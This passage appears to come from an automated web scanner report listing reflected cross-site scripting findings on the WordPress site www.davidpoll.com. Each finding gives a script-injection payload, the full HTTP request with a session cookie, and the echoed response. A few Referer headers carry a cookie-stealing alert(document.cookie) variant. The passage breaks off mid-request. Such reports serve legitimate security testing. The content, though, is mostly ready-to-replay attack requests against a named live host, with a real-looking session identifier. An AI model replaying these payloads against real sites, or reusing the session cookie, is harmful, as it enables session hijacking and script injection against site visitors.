The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b1622'><script>alert(1)</script>60670df59c9 was submitted in the REST URL parameter 2. This input was echoed as b1622\'><script>alert(1)</script>60670df59c9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/pluginsb1622'><script>alert(1)</script>60670df59c9/tweetable/main_css.css HTTP/1.1
Host: www.davidpoll.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=136124068.1296350336.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/5; PHPSESSID=0327f22e76c677f66a17b5702dd9d632; __utma=136124068.1574482894.1296350336.1296350336.1296350336.1; __utmc=136124068; __utmb=136124068.1.10.1296350336;

Response

HTTP/1.1 404 Not Found
Date: Sun, 30 Jan 2011 01:22:58 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
X-Pingback: http://www.davidpoll.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sun, 30 Jan 2011 01:22:59 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29039

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

<head profile="http://gmpg.org/xfn/11">
<meta http-equiv
...[SNIP]...
<a id='flag_en' href='http://www.davidpoll.com/wp-content/pluginsb1622\'><script>alert(1)</script>60670df59c9/tweetable/main_css.css' hreflang='en' >
...[SNIP]...

5.311. http://www.davidpoll.com/wp-content/plugins/tweetable/main_css.css [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.davidpoll.com
Path:	/wp-content/plugins/tweetable/main_css.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d9b3f'><script>alert(1)</script>fcedbfe1dcc was submitted in the REST URL parameter 3. This input was echoed as d9b3f\'><script>alert(1)</script>fcedbfe1dcc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/tweetabled9b3f'><script>alert(1)</script>fcedbfe1dcc/main_css.css HTTP/1.1
Host: www.davidpoll.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=136124068.1296350336.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/5; PHPSESSID=0327f22e76c677f66a17b5702dd9d632; __utma=136124068.1574482894.1296350336.1296350336.1296350336.1; __utmc=136124068; __utmb=136124068.1.10.1296350336;

Response

HTTP/1.1 404 Not Found
Date: Sun, 30 Jan 2011 01:23:20 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
X-Pingback: http://www.davidpoll.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sun, 30 Jan 2011 01:23:20 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29039

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

<head profile="http://gmpg.org/xfn/11">
<meta http-equiv
...[SNIP]...
<a id='flag_en' href='http://www.davidpoll.com/wp-content/plugins/tweetabled9b3f\'><script>alert(1)</script>fcedbfe1dcc/main_css.css' hreflang='en' >
...[SNIP]...

5.312. http://www.davidpoll.com/wp-content/plugins/tweetable/main_css.css [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.davidpoll.com
Path:	/wp-content/plugins/tweetable/main_css.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7a769'><script>alert(1)</script>42dc73b4f0d was submitted in the REST URL parameter 4. This input was echoed as 7a769\'><script>alert(1)</script>42dc73b4f0d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/tweetable/main_css.css7a769'><script>alert(1)</script>42dc73b4f0d HTTP/1.1
Host: www.davidpoll.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=136124068.1296350336.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/5; PHPSESSID=0327f22e76c677f66a17b5702dd9d632; __utma=136124068.1574482894.1296350336.1296350336.1296350336.1; __utmc=136124068; __utmb=136124068.1.10.1296350336;

Response

HTTP/1.1 404 Not Found
Date: Sun, 30 Jan 2011 01:23:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
X-Pingback: http://www.davidpoll.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sun, 30 Jan 2011 01:23:42 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29039

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

<head profile="http://gmpg.org/xfn/11">
<meta http-equiv
...[SNIP]...
<a id='flag_en' href='http://www.davidpoll.com/wp-content/plugins/tweetable/main_css.css7a769\'><script>alert(1)</script>42dc73b4f0d' hreflang='en' >
...[SNIP]...

5.313. http://www.davidpoll.com/wp-content/themes/fusion/js/fusion.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.davidpoll.com
Path:	/wp-content/themes/fusion/js/fusion.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 96d3c'><script>alert(1)</script>a88048e9c66 was submitted in the REST URL parameter 1. This input was echoed as 96d3c\'><script>alert(1)</script>a88048e9c66 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content96d3c'><script>alert(1)</script>a88048e9c66/themes/fusion/js/fusion.js HTTP/1.1
Host: www.davidpoll.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=136124068.1296350336.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/5; PHPSESSID=0327f22e76c677f66a17b5702dd9d632; __utma=136124068.1574482894.1296350336.1296350336.1296350336.1; __utmc=136124068; __utmb=136124068.1.10.1296350336;

Response

HTTP/1.1 404 Not Found
Date: Sun, 30 Jan 2011 01:22:47 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
X-Pingback: http://www.davidpoll.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sun, 30 Jan 2011 01:22:49 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28991

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

<head profile="http://gmpg.org/xfn/11">
<meta http-equiv
...[SNIP]...
<a id='flag_en' href='http://www.davidpoll.com/wp-content96d3c\'><script>alert(1)</script>a88048e9c66/themes/fusion/js/fusion.js' hreflang='en' >
...[SNIP]...

5.314. http://www.davidpoll.com/wp-content/themes/fusion/js/fusion.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.davidpoll.com
Path:	/wp-content/themes/fusion/js/fusion.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f4af6'><script>alert(1)</script>94b0369aa was submitted in the REST URL parameter 2. This input was echoed as f4af6\'><script>alert(1)</script>94b0369aa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themesf4af6'><script>alert(1)</script>94b0369aa/fusion/js/fusion.js HTTP/1.1
Host: www.davidpoll.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=136124068.1296350336.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/5; PHPSESSID=0327f22e76c677f66a17b5702dd9d632; __utma=136124068.1574482894.1296350336.1296350336.1296350336.1; __utmc=136124068; __utmb=136124068.1.10.1296350336;

Response

HTTP/1.1 404 Not Found
Date: Sun, 30 Jan 2011 01:23:14 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
X-Pingback: http://www.davidpoll.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sun, 30 Jan 2011 01:23:14 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28967

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

<head profile="http://gmpg.org/xfn/11">
<meta http-equiv
...[SNIP]...
<a id='flag_en' href='http://www.davidpoll.com/wp-content/themesf4af6\'><script>alert(1)</script>94b0369aa/fusion/js/fusion.js' hreflang='en' >
...[SNIP]...

5.315. http://www.davidpoll.com/wp-content/themes/fusion/js/fusion.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.davidpoll.com
Path:	/wp-content/themes/fusion/js/fusion.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4de2c'><script>alert(1)</script>9f9243aaacf was submitted in the REST URL parameter 3. This input was echoed as 4de2c\'><script>alert(1)</script>9f9243aaacf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/fusion4de2c'><script>alert(1)</script>9f9243aaacf/js/fusion.js HTTP/1.1
Host: www.davidpoll.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=136124068.1296350336.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/5; PHPSESSID=0327f22e76c677f66a17b5702dd9d632; __utma=136124068.1574482894.1296350336.1296350336.1296350336.1; __utmc=136124068; __utmb=136124068.1.10.1296350336;

Response

HTTP/1.1 404 Not Found
Date: Sun, 30 Jan 2011 01:23:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
X-Pingback: http://www.davidpoll.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sun, 30 Jan 2011 01:23:30 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28991

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

<head profile="http://gmpg.org/xfn/11">
<meta http-equiv
...[SNIP]...
<a id='flag_en' href='http://www.davidpoll.com/wp-content/themes/fusion4de2c\'><script>alert(1)</script>9f9243aaacf/js/fusion.js' hreflang='en' >
...[SNIP]...

5.316. http://www.davidpoll.com/wp-content/themes/fusion/js/fusion.js [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.davidpoll.com
Path:	/wp-content/themes/fusion/js/fusion.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a3d83'><script>alert(1)</script>9a983a4fff9 was submitted in the REST URL parameter 4. This input was echoed as a3d83\'><script>alert(1)</script>9a983a4fff9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/fusion/jsa3d83'><script>alert(1)</script>9a983a4fff9/fusion.js HTTP/1.1
Host: www.davidpoll.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=136124068.1296350336.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/5; PHPSESSID=0327f22e76c677f66a17b5702dd9d632; __utma=136124068.1574482894.1296350336.1296350336.1296350336.1; __utmc=136124068; __utmb=136124068.1.10.1296350336;

Response

HTTP/1.1 404 Not Found
Date: Sun, 30 Jan 2011 01:23:47 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
X-Pingback: http://www.davidpoll.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sun, 30 Jan 2011 01:23:47 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28991

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

<head profile="http://gmpg.org/xfn/11">
<meta http-equiv
...[SNIP]...
<a id='flag_en' href='http://www.davidpoll.com/wp-content/themes/fusion/jsa3d83\'><script>alert(1)</script>9a983a4fff9/fusion.js' hreflang='en' >
...[SNIP]...

5.317. http://www.davidpoll.com/wp-content/themes/fusion/js/fusion.js [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.davidpoll.com
Path:	/wp-content/themes/fusion/js/fusion.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7bac8'><script>alert(1)</script>5932159de94 was submitted in the REST URL parameter 5. This input was echoed as 7bac8\'><script>alert(1)</script>5932159de94 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/fusion/js/fusion.js7bac8'><script>alert(1)</script>5932159de94 HTTP/1.1
Host: www.davidpoll.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=136124068.1296350336.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/5; PHPSESSID=0327f22e76c677f66a17b5702dd9d632; __utma=136124068.1574482894.1296350336.1296350336.1296350336.1; __utmc=136124068; __utmb=136124068.1.10.1296350336;

Response

HTTP/1.1 404 Not Found
Date: Sun, 30 Jan 2011 01:24:06 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
X-Pingback: http://www.davidpoll.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sun, 30 Jan 2011 01:24:06 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28991

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

<head profile="http://gmpg.org/xfn/11">
<meta http-equiv
...[SNIP]...
<a id='flag_en' href='http://www.davidpoll.com/wp-content/themes/fusion/js/fusion.js7bac8\'><script>alert(1)</script>5932159de94' hreflang='en' >
...[SNIP]...

5.318. http://www.davidpoll.com/wp-content/themes/fusion/style.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.davidpoll.com
Path:	/wp-content/themes/fusion/style.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 50551'><script>alert(1)</script>bfed0d29885 was submitted in the REST URL parameter 1. This input was echoed as 50551\'><script>alert(1)</script>bfed0d29885 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content50551'><script>alert(1)</script>bfed0d29885/themes/fusion/style.css HTTP/1.1
Host: www.davidpoll.com
Proxy-Connection: keep-alive
Referer: http://www.davidpoll.com/2011/01/26/quickly-building-a-trial-mode-for-a-windows-phone-application492d1'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6033be6539a/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=0327f22e76c677f66a17b5702dd9d632

Response

HTTP/1.1 404 Not Found
Date: Sun, 30 Jan 2011 01:35:38 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
X-Pingback: http://www.davidpoll.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sun, 30 Jan 2011 01:35:39 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 28955

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

<head profile="http://gmpg.org/xfn/11">
<meta http-equiv
...[SNIP]...
<a id='flag_en' href='http://www.davidpoll.com/wp-content50551\'><script>alert(1)</script>bfed0d29885/themes/fusion/style.css' hreflang='en' >
...[SNIP]...

5.319. http://www.davidpoll.com/wp-content/themes/fusion/style.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.davidpoll.com
Path:	/wp-content/themes/fusion/style.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 16b66'><script>alert(1)</script>deb5d103fe9 was submitted in the REST URL parameter 2. This input was echoed as 16b66\'><script>alert(1)</script>deb5d103fe9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes16b66'><script>alert(1)</script>deb5d103fe9/fusion/style.css HTTP/1.1
Host: www.davidpoll.com
Proxy-Connection: keep-alive
Referer: http://www.davidpoll.com/2011/01/26/quickly-building-a-trial-mode-for-a-windows-phone-application492d1'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6033be6539a/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=0327f22e76c677f66a17b5702dd9d632

Response

HTTP/1.1 404 Not Found
Date: Sun, 30 Jan 2011 01:36:01 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
X-Pingback: http://www.davidpoll.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sun, 30 Jan 2011 01:36:01 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 28955

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

<head profile="http://gmpg.org/xfn/11">
<meta http-equiv
...[SNIP]...
<a id='flag_en' href='http://www.davidpoll.com/wp-content/themes16b66\'><script>alert(1)</script>deb5d103fe9/fusion/style.css' hreflang='en' >
...[SNIP]...

5.320. http://www.davidpoll.com/wp-content/themes/fusion/style.css [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.davidpoll.com
Path:	/wp-content/themes/fusion/style.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e53ad'><script>alert(1)</script>b5fc692f83c was submitted in the REST URL parameter 3. This input was echoed as e53ad\'><script>alert(1)</script>b5fc692f83c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/fusione53ad'><script>alert(1)</script>b5fc692f83c/style.css HTTP/1.1
Host: www.davidpoll.com
Proxy-Connection: keep-alive
Referer: http://www.davidpoll.com/2011/01/26/quickly-building-a-trial-mode-for-a-windows-phone-application492d1'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6033be6539a/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=0327f22e76c677f66a17b5702dd9d632

Response

HTTP/1.1 404 Not Found
Date: Sun, 30 Jan 2011 01:36:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
X-Pingback: http://www.davidpoll.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sun, 30 Jan 2011 01:36:31 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 28955

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

<head profile="http://gmpg.org/xfn/11">
<meta http-equiv
...[SNIP]...
<a id='flag_en' href='http://www.davidpoll.com/wp-content/themes/fusione53ad\'><script>alert(1)</script>b5fc692f83c/style.css' hreflang='en' >
...[SNIP]...

5.321. http://www.davidpoll.com/wp-content/themes/fusion/style.css [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.davidpoll.com
Path:	/wp-content/themes/fusion/style.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload bf215'><script>alert(1)</script>7a65bd68b30 was submitted in the REST URL parameter 4. This input was echoed as bf215\'><script>alert(1)</script>7a65bd68b30 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/fusion/style.cssbf215'><script>alert(1)</script>7a65bd68b30 HTTP/1.1
Host: www.davidpoll.com
Proxy-Connection: keep-alive
Referer: http://www.davidpoll.com/2011/01/26/quickly-building-a-trial-mode-for-a-windows-phone-application492d1'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6033be6539a/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=0327f22e76c677f66a17b5702dd9d632

Response

HTTP/1.1 404 Not Found
Date: Sun, 30 Jan 2011 01:36:58 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
X-Pingback: http://www.davidpoll.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sun, 30 Jan 2011 01:36:58 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 28955

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

<head profile="http://gmpg.org/xfn/11">
<meta http-equiv
...[SNIP]...
<a id='flag_en' href='http://www.davidpoll.com/wp-content/themes/fusion/style.cssbf215\'><script>alert(1)</script>7a65bd68b30' hreflang='en' >
...[SNIP]...

5.322. http://www.davidpoll.com/wp-includes/js/jquery/jquery.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.davidpoll.com
Path:	/wp-includes/js/jquery/jquery.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8460a'><script>alert(1)</script>d095b2bd0ba was submitted in the REST URL parameter 1. This input was echoed as 8460a\'><script>alert(1)</script>d095b2bd0ba in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includes8460a'><script>alert(1)</script>d095b2bd0ba/js/jquery/jquery.js HTTP/1.1
Host: www.davidpoll.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=136124068.1296350336.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/5; PHPSESSID=0327f22e76c677f66a17b5702dd9d632; __utma=136124068.1574482894.1296350336.1296350336.1296350336.1; __utmc=136124068; __utmb=136124068.1.10.1296350336;

Response

HTTP/1.1 404 Not Found
Date: Sun, 30 Jan 2011 01:23:33 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
X-Pingback: http://www.davidpoll.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sun, 30 Jan 2011 01:23:33 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28919

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

<head profile="http://gmpg.org/xfn/11">
<meta http-equiv
...[SNIP]...
<a id='flag_en' href='http://www.davidpoll.com/wp-includes8460a\'><script>alert(1)</script>d095b2bd0ba/js/jquery/jquery.js' hreflang='en' >
...[SNIP]...

5.323. http://www.davidpoll.com/wp-includes/js/jquery/jquery.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.davidpoll.com
Path:	/wp-includes/js/jquery/jquery.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b5197'><script>alert(1)</script>536fa7560e0 was submitted in the REST URL parameter 2. This input was echoed as b5197\'><script>alert(1)</script>536fa7560e0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includes/jsb5197'><script>alert(1)</script>536fa7560e0/jquery/jquery.js HTTP/1.1
Host: www.davidpoll.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=136124068.1296350336.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/5; PHPSESSID=0327f22e76c677f66a17b5702dd9d632; __utma=136124068.1574482894.1296350336.1296350336.1296350336.1; __utmc=136124068; __utmb=136124068.1.10.1296350336;

Response

HTTP/1.1 404 Not Found
Date: Sun, 30 Jan 2011 01:23:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
X-Pingback: http://www.davidpoll.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sun, 30 Jan 2011 01:23:51 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28919

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

<head profile="http://gmpg.org/xfn/11">
<meta http-equiv
...[SNIP]...
<a id='flag_en' href='http://www.davidpoll.com/wp-includes/jsb5197\'><script>alert(1)</script>536fa7560e0/jquery/jquery.js' hreflang='en' >
...[SNIP]...

5.324. http://www.davidpoll.com/wp-includes/js/jquery/jquery.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.davidpoll.com
Path:	/wp-includes/js/jquery/jquery.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8a3f9'><script>alert(1)</script>d614a331f52 was submitted in the REST URL parameter 3. This input was echoed as 8a3f9\'><script>alert(1)</script>d614a331f52 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includes/js/jquery8a3f9'><script>alert(1)</script>d614a331f52/jquery.js HTTP/1.1
Host: www.davidpoll.com
Accept: */*
Accept-Language: en
